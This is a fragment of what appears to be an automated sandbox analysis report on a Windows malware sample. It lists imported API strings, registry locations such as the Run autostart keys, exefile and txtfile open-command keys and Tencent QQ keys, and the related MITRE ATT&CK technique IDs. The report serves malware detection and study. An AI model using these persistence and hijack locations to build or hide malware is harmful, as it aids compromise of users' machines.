{"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"SOFTWARE\\Classes\\MSipy\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"Software\\Classes\\MSipv\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"Software\\Classes\\txtfile\\shell\\open\\command\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"Software\\Classes\\exefile\\shell\\open\\command\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"SOFTWARE\\TENCENT\\QQ\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"SOFTWARE\\GoldenSoft\\Recovery Genius 21st\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"SOFTWARE\\GoldenSoft\\Recovery Genius\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"SOFTWARE\\YuanZhi\\Recovery Genius 21st\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"SOFTWARE\\YuanZhi\\Recovery Genius\" in Source: 531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\n \"ISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\" in Source: 00000000-00005736.00000000.65854.001C0000.00000004.mdmp\n \"SOFTWARE\\Classes\\MSipy\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"Software\\Classes\\MSipv\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"Software\\Classes\\txtfile\\shell\\open\\command\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"Software\\Classes\\exefile\\shell\\open\\command\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"SOFTWARE\\TENCENT\\QQ\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"SOFTWARE\\TENCENT\\PLATFORM_TYPE_LIST\\1\" in Source: 00000000-00005736.00000001.66440.0040C000.00000080.mdmp\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005856.00000000.65988.002F0000.00000004.mdmp\n 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" in Source: 00000000-00005856.00000000.65988.002F0000.00000004.mdmp\n 00000000-00005856.00000001.66223.002F0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"RegCreateKeyExA\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"4486307328,5724,3139,,CreateProcessA,kernel32.dll,\"252:02:39.227\",RX=0,PX=0\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005736.00000000.65854.001C0000.00000004.mdmp\")\n Found reference to API \"ElevateCreateProcess\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005856.00000000.65988.002F0000.00000004.mdmp, 00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegDeleteKeyA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"lstrlenA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"WinExec\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"OpenFile\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"OpenProcess\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetFileTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SetSystemTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"CreateEventA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"Sleep\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetParent\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"FindWindowA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"IsWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetKeyState\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SendMessageA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"FindWindowExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"SetTimer\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"LoadIconA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"InternetTimeToSystemTime\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"InternetReadFile\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"InternetConnectA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"DeleteUrlCacheEntry\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"htonl\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"WSACleanup\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"WSAStartup\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"gethostbyname\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"htons\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"closesocket\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"EnumProcessModules\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"EnumProcesses\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"Process32Next\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"Process32First\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"AnimateWindow\"; File: \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateEventA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetSystemTime\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTempFileNameA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"OpenProcess\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005736.00000001.66440.0040B000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetFileTime\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"OpenFile\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ReadProcessMemory\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"WinExec\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"LoadIconA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetTimer\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SendMessageA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetKeyState\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnableWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetParent\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindWindowA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"FindWindowExA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"SetWindowPos\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteKeyA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"RegSetValueExA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetOpenA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetConnectA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpOpenRequestA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpAddRequestHeadersA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpSendRequestA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetTimeToSystemTime\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetReadFile\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"DeleteUrlCacheEntry\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameExA\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"EnumProcesses\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"InternetGetConnectedState\"; Source: \"00000000-00005736.00000001.66440.0040C000.00000080.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005856.00000001.66223.0040B000.00000040.mdmp\")\n Found reference to API 